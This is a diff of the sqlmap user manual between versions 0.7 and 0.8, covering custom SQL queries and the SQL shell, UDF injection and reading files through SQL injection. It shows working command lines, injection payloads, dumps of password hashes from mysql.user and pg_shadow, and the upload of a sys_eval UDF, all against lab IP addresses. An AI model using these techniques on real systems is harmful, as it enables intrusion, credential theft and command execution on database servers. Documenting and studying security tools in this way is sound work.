      -| id | name                                         | surname           |
      -+----+----------------------------------------------+-------------------+
      -| 1  | luther                                       | blissett          |
      -| 2  | fluffy                                       | bunny             |
      -| 3  | wu                                           | ming              |
      -| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
      -| 5  | NULL                                         | nameisnull        |
      -+----+----------------------------------------------+-------------------+
      ++----+--------------------------------------------+-------------------+
      +| id | name                                       | surname           |
      ++----+--------------------------------------------+-------------------+
      +| 1  | luther                                     | blissett          |
      +| 2  | fluffy                                     | bunny             |
      +| 3  | wu                                         | ming              |
      +| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
      +| 5  | NULL                                       | nameisnull        |
      ++----+--------------------------------------------+-------------------+
       
       Database: information_schema
       Table: CHARACTER_SETS
      @@ -3496,15 +3790,15 @@ Table: CHARACTER_SETS
       

      -

      You can also provide the --exclude-sysdbs option to exclude all -system databases so that sqlmap will only dump entries of users' databases +

      You can also provide the --exclude-sysdbs option to exclude all +system databases. In that case sqlmap will only dump entries of users' databases tables.

      Example on a Microsoft SQL Server 2000 Service Pack 0 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dump-all \
         --exclude-sysdbs -v 0
       
       Database: master
      @@ -3533,7 +3827,7 @@ Table: users
       +----+----------------------------------------------+-------------------+
       | id | name                                         | surname           |
       +----+----------------------------------------------+-------------------+
      -| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
      +| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net)   | user agent header |
       | 2  | fluffy                                       | bunny             |
       | 1  | luther                                       | blisset           |
       | 3  | wu                                           | ming              |
      @@ -3550,65 +3844,63 @@ considered a system database because some database administrators use it
       as a users' database.

      -

      Run your own SQL statement

      +

      Execute custom SQL statement

      -

      Options: --sql-query and --sql-shell

      +

      Options: --sql-query and --sql-shell

      -

      The SQL query and the SQL shell features makes the user able to run -custom SQL statement on the web application's back-end database management. -sqlmap automatically recognize the type of SQL statement provided and -choose which SQL injection technique to use to execute it: if it is a -SELECT statement it will retrieve its output through the blind SQL -injection or UNION query SQL injection technique depending on the user's -options, otherwise it will execute the query through the stacked query -SQL injection technique if the web application supports multiple -statements on the back-end database management system.

      +

      The SQL query and the SQL shell features makes the user able to execute +custom SQL statements on the web application's back-end database +management. +sqlmap automatically dissects the provided statement, determines which +technique to use to inject it and how to pack the SQL payload accordingly.

      +

      If it is a SELECT statement, sqlmap will retrieve its output +through the blind SQL injection or UNION query SQL injection technique +depending on the user's options. Otherwise it will execute the query +through the stacked query SQL injection technique if the web application +supports multiple statements on the back-end database management system.

      Examples on a Microsoft SQL Server 2000 Service Pack 0 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
         "SELECT 'foo'" -v 1
       
       [...]
       [hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
      -[hh:mm:14] [INFO] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), 
      -(CHAR(32)))
       [hh:mm:14] [INFO] retrieved: foo
      -[hh:mm:14] [INFO] performed 27 queries in 0 seconds
       SELECT 'foo':    'foo'
       
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
      -  "SELECT 'foo', 'bar'" -v 1
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
      +  "SELECT 'foo', 'bar'" -v 2
       
       [...]
       [hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
       [hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into 
       distinct queries to be able to retrieve the output even if we are going blind
      -[hh:mm:50] [INFO] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), 
      +[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), 
       (CHAR(32)))
       [hh:mm:50] [INFO] retrieved: foo
      -[hh:mm:50] [INFO] performed 27 queries in 0 seconds
      -[hh:mm:50] [INFO] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), 
      +[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
      +[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), 
       (CHAR(32)))
       [hh:mm:50] [INFO] retrieved: bar
      -[hh:mm:50] [INFO] performed 27 queries in 0 seconds
      +[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
       SELECT 'foo', 'bar':    'foo, bar'
       

      -

      As you can see from this last example, sqlmap splits the query in two -different SELECT statement to be able to retrieve the output even -when using the blind SQL injection technique. -Otherwise in UNION query SQL injection technique it only performs a single +

      As you can see from the last example, sqlmap splits provided query into two +different SELECT statements for it to be able to retrieve the +output even in case when using the blind SQL injection technique. +Otherwise, in UNION query SQL injection technique it only performs a single HTTP request to get the user's query output:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
      -  "SELECT 'foo', 'bar'" -v 1 --union-use
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
      +  "SELECT 'foo', 'bar'" -v 2 --union-use
       
       [...]
       [hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
      @@ -3618,12 +3910,12 @@ technique
       [hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id'
       [hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection
       vulnerability
      -[hh:mm:03] [INFO] query:  UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
      +[hh:mm:03] [DEBUG] query:  UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
       CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))
       +(CHAR(105)+CHAR(65)+CHAR(119)+CHAR(105)+CHAR(108)+CHAR(108))+ISNULL(CAST((CHAR(98)+CHAR(97)+
       CHAR(114)) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(66)+CHAR(78)+CHAR(104)+CHAR(75)+CHAR(114)+
       CHAR(116)), NULL-- AND 8373=8373
      -[hh:mm:03] [INFO] performed 3 queries in 0 seconds
      +[hh:mm:03] [DEBUG] performed 3 queries in 0 seconds
       SELECT 'foo', 'bar' [1]:
       [*] foo, bar
       
      @@ -3631,17 +3923,17 @@ SELECT 'foo', 'bar' [1]:

      If your SELECT statement contains a FROM clause, sqlmap -asks the user if such statement can return multiple entries and in such +asks the user if such statement can return multiple entries. In that case the tool knows how to unpack the query correctly to retrieve its -whole output entry per entry when going through blind SQL injection -technique. Through UNION query SQL injection it retrieved the whole output -in a single response.

      +whole output, entry per entry, when going through blind SQL injection +technique. In provided example, UNION query SQL injection it retrieved +the whole output in a single response.

      Example on a PostgreSQL 8.3.5 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-query \
         "SELECT usename FROM pg_user" -v 0
       
       [hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
      @@ -3658,20 +3950,20 @@ SELECT usename FROM pg_user [2]:
       

      -

      As you can see from the last example, sqlmap counted the number of entries -for your query and asks how many entries you want to dump. -Otherwise if you specify also the LIMIT, or similar, clause -sqlmap will not ask anything, it just unpacks the query and return its -output entry per entry when going through blind SQL injection technique. -Through UNION query SQL injection it retrieved the whole output in a -single response.

      +

      As you can see from the last example, sqlmap counts the number of entries +for a given query and asks for number of entries to dump. +Otherwise, if the LIMIT is also specified, or similar clause, +sqlmap will not ask for anything. It will just unpack the query and return its +output, entry per entry, when going through blind SQL injection technique. +In a given example, sqlmap used UNION query SQL injection to retrieve the +whole output in a single response.

      Example on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query \
      -  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-query \
      +  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 2
       
       [...]
       back-end DBMS:  MySQL >= 5.0.0
      @@ -3680,30 +3972,30 @@ back-end DBMS:  MySQL >= 5.0.0
       mysql.user LIMIT 1, 3'
       [hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
       into distinct queries to be able to retrieve the output even if we are going blind
      -[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
       mysql.user LIMIT 1, 1
       [hh:mm:22] [INFO] retrieved: localhost
      -[hh:mm:22] [INFO] performed 69 queries in 0 seconds
      -[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:22] [DEBUG] performed 69 queries in 0 seconds
      +[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
       mysql.user LIMIT 1, 1
       [hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
      -[hh:mm:24] [INFO] performed 293 queries in 2 seconds
      -[hh:mm:24] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:24] [DEBUG] performed 293 queries in 2 seconds
      +[hh:mm:24] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
       mysql.user LIMIT 2, 1
       [hh:mm:24] [INFO] retrieved: localhost
      -[hh:mm:25] [INFO] performed 69 queries in 0 seconds
      -[hh:mm:25] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:25] [DEBUG] performed 69 queries in 0 seconds
      +[hh:mm:25] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
       mysql.user LIMIT 2, 1
       [hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
      -[hh:mm:27] [INFO] performed 293 queries in 2 seconds
      -[hh:mm:27] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:27] [DEBUG] performed 293 queries in 2 seconds
      +[hh:mm:27] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
       mysql.user LIMIT 3, 1
       [hh:mm:27] [INFO] retrieved: localhost
      -[hh:mm:28] [INFO] performed 69 queries in 0 seconds
      -[hh:mm:28] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
      +[hh:mm:28] [DEBUG] performed 69 queries in 0 seconds
      +[hh:mm:28] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
       FROM mysql.user LIMIT 3, 1
       [hh:mm:28] [INFO] retrieved: 
      -[hh:mm:28] [INFO] performed 6 queries in 0 seconds
      +[hh:mm:28] [DEBUG] performed 6 queries in 0 seconds
       SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
       [*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
       [*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
      @@ -3712,16 +4004,16 @@ SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
       

      -

      The SQL shell option gives you access to run your own SQL statement -interactively, like a SQL console logged to the back-end database +

      The SQL shell option gives you an access to run your own SQL statement +interactively, like a SQL console connected to the back-end database management system. -This feature has TAB completion and history support.

      +Note that this feature provides TAB completion and history support.

      Example of history support on a PostgreSQL 8.3.5 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
       
       sql> SELECT 'foo'
       SELECT 'foo':    'foo'
      @@ -3733,7 +4025,7 @@ SELECT version():    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc
       
       sql> exit
       
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
       
       sql> [UP arrow key shows 'exit', then DOWN arrow key clean the shell]
       sql> SELECT usename, passwd FROM pg_shadow ORDER BY usename
      @@ -3755,7 +4047,7 @@ SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
       

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
       
       sql> [TAB TAB]
        LIMIT 
      @@ -3791,14 +4083,14 @@ sql> SELECT
       
       

      As you can see the TAB functionality shows the queries defined for the back-end database management system in sqlmap XML queries file, but you -can run whatever SELECT statement that you want.

      +can run whatever SELECT statement you want.

      Example of asterisk expansion on a MySQL 5.0.67 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-shell \
      -  -v 1
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-shell \
      +  -v 2
       
       [...]
       [hh:mm:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
      @@ -3808,32 +4100,32 @@ sql> SELECT * FROM test.users
       column names itself.
       [hh:mm:48] [INFO] fetching columns for table 'users' on database 'test'
       [hh:mm:48] [INFO] fetching number of columns for table 'users' on database 'test'
      -[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
      +[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
       FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
       table_schema=CHAR(116,101,115,116)
       [hh:mm:48] [INFO] retrieved: 3
      -[hh:mm:48] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:48] [DEBUG] performed 13 queries in 0 seconds
      +[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
       information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
       table_schema=CHAR(116,101,115,116) LIMIT 0, 1
       [hh:mm:48] [INFO] retrieved: id
      -[hh:mm:48] [INFO] performed 20 queries in 0 seconds
      -[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:48] [DEBUG] performed 20 queries in 0 seconds
      +[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
       information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
       table_schema=CHAR(116,101,115,116) LIMIT 1, 1
       [hh:mm:48] [INFO] retrieved: name
      -[hh:mm:48] [INFO] performed 34 queries in 0 seconds
      -[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:48] [DEBUG] performed 34 queries in 0 seconds
      +[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
       information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
       table_schema=CHAR(116,101,115,116) LIMIT 2, 1
       [hh:mm:48] [INFO] retrieved: surname
      -[hh:mm:48] [INFO] performed 55 queries in 0 seconds
      +[hh:mm:48] [DEBUG] performed 55 queries in 0 seconds
       [hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users
       [hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
      -[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:04] [DEBUG] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM 
       test.users
       [hh:mm:04] [INFO] retrieved: 5
      -[hh:mm:04] [INFO] performed 13 queries in 0 seconds
      +[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds
       [hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many 
       entries 
       do you want to retrieve?
      @@ -3842,42 +4134,42 @@ do you want to retrieve?
       [q] Quit
       Choice: 3
       [hh:mm:09] [INFO] sqlmap is now going to retrieve the first 3 query output entries
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
       ORDER BY id ASC LIMIT 0, 1
       [hh:mm:09] [INFO] retrieved: 1
      -[hh:mm:09] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
      +[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
       ORDER BY id ASC LIMIT 0, 1
       [hh:mm:09] [INFO] retrieved: luther
      -[hh:mm:09] [INFO] performed 48 queries in 0 seconds
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
       test.users ORDER BY id ASC LIMIT 0, 1
       [hh:mm:09] [INFO] retrieved: blissett
      -[hh:mm:09] [INFO] performed 62 queries in 0 seconds
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
      +[hh:mm:09] [DEBUG] performed 62 queries in 0 seconds
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
       ORDER BY id ASC LIMIT 1, 1
       [hh:mm:09] [INFO] retrieved: 2
      -[hh:mm:09] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
      +[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
       ORDER BY id ASC LIMIT 1, 1
       [hh:mm:09] [INFO] retrieved: fluffy
      -[hh:mm:09] [INFO] performed 48 queries in 0 seconds
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
       test.users ORDER BY id ASC LIMIT 1, 1
       [hh:mm:09] [INFO] retrieved: bunny
      -[hh:mm:09] [INFO] performed 41 queries in 0 seconds
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
      +[hh:mm:09] [DEBUG] performed 41 queries in 0 seconds
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
       ORDER BY id ASC LIMIT 2, 1
       [hh:mm:09] [INFO] retrieved: 3
      -[hh:mm:09] [INFO] performed 13 queries in 0 seconds
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
      +[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
       ORDER BY id ASC LIMIT 2, 1
       [hh:mm:09] [INFO] retrieved: wu
      -[hh:mm:09] [INFO] performed 20 queries in 0 seconds
      -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
      +[hh:mm:09] [DEBUG] performed 20 queries in 0 seconds
      +[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
       test.users ORDER BY id ASC LIMIT 2, 1
       [hh:mm:09] [INFO] retrieved: ming
      -[hh:mm:10] [INFO] performed 34 queries in 0 seconds
      +[hh:mm:10] [DEBUG] performed 34 queries in 0 seconds
       SELECT * FROM test.users [3]:
       [*] 1, luther, blissett
       [*] 2, fluffy, bunny
      @@ -3886,9 +4178,9 @@ SELECT * FROM test.users [3]:
       

      -

      As you can see in this last example, if the SELECT statement has -an asterisk instead of the column(s) name, sqlmap first retrieves the -column names of the table then asks if the query can return multiple +

      As you can see from the example, if the SELECT statement has +an asterisk instead of the column(s) name, sqlmap first retrieves all +column names of the current table, asks if the query can return multiple entries and goes on.

      Example of SQL statement other than SELECT on a PostgreSQL @@ -3896,73 +4188,119 @@ entries and goes on.

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
       
       [...]
       back-end DBMS: PostgreSQL
       
       [10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
       sql> SELECT COUNT(name) FROM users
      -[10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
      -[10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
      -[10:11:59] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) 
      -FROM users
      -[10:11:59] [INFO] retrieved: 4
      -[10:11:59] [INFO] performed 13 queries in 0 seconds
      +[hh:mm:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
      +[hh:mm:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
      +[hh:mm:59] [INFO] retrieved: 4
       SELECT COUNT(name) FROM users:    '4'
       
       sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
      -[10:12:35] [INFO] testing stacked queries support on parameter 'id'
      -[10:12:40] [INFO] the web application supports stacked queries on parameter 'id'
      -[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users 
      +[hh:mm:35] [INFO] testing stacked queries support on parameter 'id'
      +[hh:mm:40] [INFO] the web application supports stacked queries on parameter 'id'
      +[hh:mm:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users 
       (id, name, surname) VALUES (5, 'from', 'sql shell');'
      -[10:12:40] [INFO] done
      +[hh:mm:40] [INFO] done
       sql> SELECT COUNT(name) FROM users
      -[10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
      -[10:12:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
      -[10:12:53] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) 
      -FROM users
      -[10:12:53] [INFO] retrieved: 5
      -[10:12:54] [INFO] performed 20 queries in 0 seconds
      +[hh:mm:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
      +[hh:mm:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
      +[hh:mm:53] [INFO] retrieved: 5
       SELECT COUNT(name) FROM users:    '5'
       

      -

      As you can see from this last example, when the user provides a SQL -statement other than SELECT, sqlmap recognizes it, tests if the -web application supports stacked queries and in case it does, it executes -the provided SQL statement in a multiple statement.

      +

      As you can see from the example, when the user provides a SQL statement +other than SELECT, sqlmap recognizes it, tests if the web +application supports stacked queries and in case it does, it executes +the provided SQL statement in a multiple statement mode.

      Beware that some web application technologies do not support stacked -queries on specific database management systems. For instance, PHP does not -support stacked queries when the back-end DBMS is MySQL, but it does +queries on specific database management systems. For instance, PHP does +not support stacked queries when the back-end DBMS is MySQL, but it does support when the back-end DBMS is PostgreSQL.

      -

      5.8 File system access +

      5.8 User-defined function injection

      -

      Read a file from the back-end DBMS file system

      +

      Inject custom user-defined functions (UDF)

      -

      Option: --read-file

      +

      Options: --udf-inject and --shared-lib

      + +

      You can inject your own user-defined functions (UDFs) by compiling a +MySQL or PostgreSQL shared library, DLL for Windows and shared object for +Linux/Unix, then provide sqlmap with the path where the shared library +is stored locally on your machine. sqlmap will then ask you some +questions, upload the shared library on the database server file system, +create the user-defined function(s) from it and, depending on your +options, execute them. When you are finished using the injected UDFs, +sqlmap can also remove them from the database for you.

      + +

      Example on a PostgreSQL 8.4:

      +

      +

      +
      +$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
      +
      +[...]
      +web application technology: PHP 5.2.6, Apache 2.2.9
      +back-end DBMS: PostgreSQL
      +
      +which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
      +how many user-defined functions do you want to create from the shared library? 1
      +what is the name of the UDF number 1? sys_eval
      +how many input parameters takes UDF 'sys_eval'? (default: 1) 
      +what is the data-type of input parameter number 1? (default: text) 
      +what is the data-type of the return value? (default: text) 
      +do you want to call your injected user-defined functions now? [Y/n/q] y
      +which UDF do you want to call?
      +[1] sys_eval
      +[q] Quit
      +> 1
      +what is the value of the parameter number 1 (data-type: text)? echo test
      +do you want to retrieve the return value of the UDF? [Y/n] 
      +return value:    'test'
      +
      +do you want to call this or another injected UDF? [Y/n] n
      +do you want to remove UDF 'sys_eval'? [Y/n] 
      +[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only 
      +be deleted manually
      +
      +
      +

      + +

      If you want, you can specify the shared library local file system path +via command line using --shared-lib option.

      + +

      5.9 File system access +

      + +

      Read a file from the database server's file system

      + +

      Option: --read-file

      It is possible to retrieve the content of files from the underlying file system when the back-end database management system is either MySQL, -PostgreSQL or Microsoft SQL Server and the session user has the needed +PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. -The file specified can be either a text or a binary file, sqlmap will -handle either cases automatically.

      +The file specified can be either a text or a binary file. sqlmap will +handle it automatically.

      -

      These techniques are detailed on the white paper +

      These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

      Example on a PostgreSQL 8.3.5 target to retrieve a text file:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.aspx?id=1" \
         --read-file "C:\example.txt" -v 2
       
       [...]
      @@ -4011,11 +4349,11 @@ sqlmapfile
       [hh:mm:22] [DEBUG] cleaning up the database management system
       [hh:mm:22] [DEBUG] removing support tables
       [hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
      -C:/example.txt file saved to:    '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
      +C:/example.txt file saved to:    '/home/inquis/sqlmap/output/172.16.213.131/files/C__example.txt'
       
      -[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
      +[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/172.16.213.131'
       
      -$ cat output/192.168.1.121/files/C__example.txt 
      +$ cat output/172.16.213.131/files/C__example.txt 
       This is a text file
       
      @@ -4026,7 +4364,7 @@ retrieve a binary file:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
         --read-file "C:\example.exe" --union-use -v 1
       
       [...]
      @@ -4044,41 +4382,41 @@ injection vulnerability
       'name' by appending a false condition after the parameter value
       [hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) 
       inband sql injection vulnerability
      -valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
      +valid union:    'http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
       ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ'
       
       [hh:mm:49] [INFO] testing stacked queries support on parameter 'name'
       [hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name'
       [hh:mm:54] [INFO] fetching file: 'C:/example.exe'
       [hh:mm:54] [INFO] the SQL query provided returns 3 entries
      -C:/example.exe file saved to:    '/home/inquis/sqlmap/output/192.168.1.121/files/
      +C:/example.exe file saved to:    '/home/inquis/sqlmap/output/172.16.213.131/files/
       C__example.exe'
       
